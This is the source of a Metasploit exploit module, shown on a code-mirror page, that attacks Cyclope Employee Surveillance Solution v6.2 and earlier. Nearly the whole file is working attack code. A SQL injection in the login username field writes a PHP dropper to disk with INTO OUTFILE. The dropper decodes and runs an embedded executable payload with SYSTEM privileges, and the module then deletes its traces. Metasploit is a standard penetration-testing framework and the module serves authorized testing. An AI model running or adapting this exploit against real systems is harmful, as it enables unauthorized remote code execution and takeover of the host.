Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/cyclope_ess_sqli.rb
33488 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "Cyclope Employee Surveillance Solution v6 SQL Injection",

17
        'Description' => %q{

18
          This module exploits a SQL injection found in Cyclope Employee Surveillance

19
          Solution.  Because the login script does not properly handle the user-supplied

20
          username parameter, a malicious user can manipulate the SQL query, and allows

21
          arbitrary code execution under the context of 'SYSTEM'.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'loneferret', # Original discovery, PoC

26
          'sinn3r' # Metasploit

27
        ],

28
        'References' => [

29
          ['CVE', '2012-10047'],

30
          ['OSVDB', '84517'],

31
          ['EDB', '20393']

32
        ],

33
        'Payload' => {

34
          'BadChars' => "\x00"

35
        },

36
        'DefaultOptions' => {

37
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          ['Cyclope Employee Surveillance Solution v6.2 or older', {}]

42
        ],

43
        'Privileged' => false,

44
        'DisclosureDate' => '2012-08-08',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        OptPort.new('RPORT', [true, "The web application's port", 7879]),

57
        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])

58
      ]

59
    )

60


61
    self.needs_cleanup = true

62
  end

63


64
  def check

65
    peer = "#{rhost}:#{rport}"

66
    path = File.dirname("#{target_uri.path}/.")

67
    b64_version = get_version(path)

68
    if b64_version.empty?

69
      vprint_error("Unable to determine the version number")

70
    else

71
      b64_version = Rex::Text.decode_base64(b64_version)

72
      if b64_version =~ /^[0-6]\.1/

73
        return Exploit::CheckCode::Appears

74
      end

75
    end

76


77
    return Exploit::CheckCode::Safe

78
  end

79


80
  def get_version(path)

81
    res = send_request_raw({ 'uri' => "#{path}index.php" })

82
    return '' if not res

83


84
    v = res.body.scan(/\<link rel\=\"stylesheet\" type\=\"text\/css\" href\=\"([\w\=]+)\/css\/.+\" \/\>/).flatten[0]

85
    return '' if not v

86


87
    return v

88
  end

89


90
  def on_new_session(cli)

91
    if cli.type != 'meterpreter'

92
      print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")

93
      return

94
    end

95


96
    cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

97


98
    begin

99
      print_warning("Deleting #{@php_fname}")

100
      cli.fs.file.rm(@php_fname)

101
    rescue ::Exception => e

102
      print_error("Please note: #{@php_fname} is stil on disk.")

103
    end

104


105
    begin

106
      print_warning("Deleting #{@exe_fname}")

107
      cli.fs.file.rm(@exe_fname)

108
    rescue ::Exception => e

109
      print_error("Please note: #{@exe_fname} is still on disk.")

110
    end

111
  end

112


113
  def get_php_payload(fname)

114
    p = Rex::Text.encode_base64(generate_payload_exe)

115
    php = %Q|

116
    <?php

117
    $f = fopen("#{fname}", "wb");

118
    fwrite($f, base64_decode("#{p}"));

119
    fclose($f);

120
    exec("#{fname}");

121
    ?>

122
    |

123
    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')

124
    return php

125
  end

126


127
  def exploit

128
    peer = "#{rhost}:#{rport}"

129
    path = File.dirname("#{target_uri.path}/.")

130


131
    #

132
    # Need to fingerprint the version number in Base64 for the payload path

133
    #

134
    b64_version = get_version(path)

135
    if b64_version.empty?

136
      print_error("Unable to determine the version number")

137
      return

138
    end

139


140
    print_status("Obtained version: #{Rex::Text.decode_base64(b64_version)}")

141


142
    #

143
    # Prepare our payload (naughty exe embedded in php)

144
    #

145
    @exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'

146
    @php_fname = Rex::Text.rand_text_alpha(6) + '.php'

147
    php = get_php_payload(@exe_fname).unpack("H*")[0]

148
    sqli = "x' or (SELECT 0x20 into outfile '/Progra~1/Cyclope/#{b64_version}/#{@php_fname}' LINES TERMINATED BY 0x#{php}) and '1'='1"

149


150
    #

151
    # Inject payload

152
    #

153
    print_status("Injecting PHP payload...")

154
    res = send_request_cgi({

155
      'method' => 'POST',

156
      'uri' => path,

157
      'vars_post' => {

158
        'act' => 'auth-login',

159
        'pag' => 'login',

160
        'username' => sqli,

161
        'password' => Rex::Text.rand_text_alpha(5)

162
      }

163
    })

164


165
    #

166
    # Load our payload

167
    #

168
    print_status("Loading payload: #{path}#{b64_version}/#{@php_fname}")

169
    send_request_raw({ 'uri' => "#{path}#{b64_version}/#{@php_fname}" })

170
    if res and res.code == 404

171
      print_error("Server returned 404, the upload attempt probably failed")

172
      return

173
    end

174


175
    handler

176
  end

177
end

178


179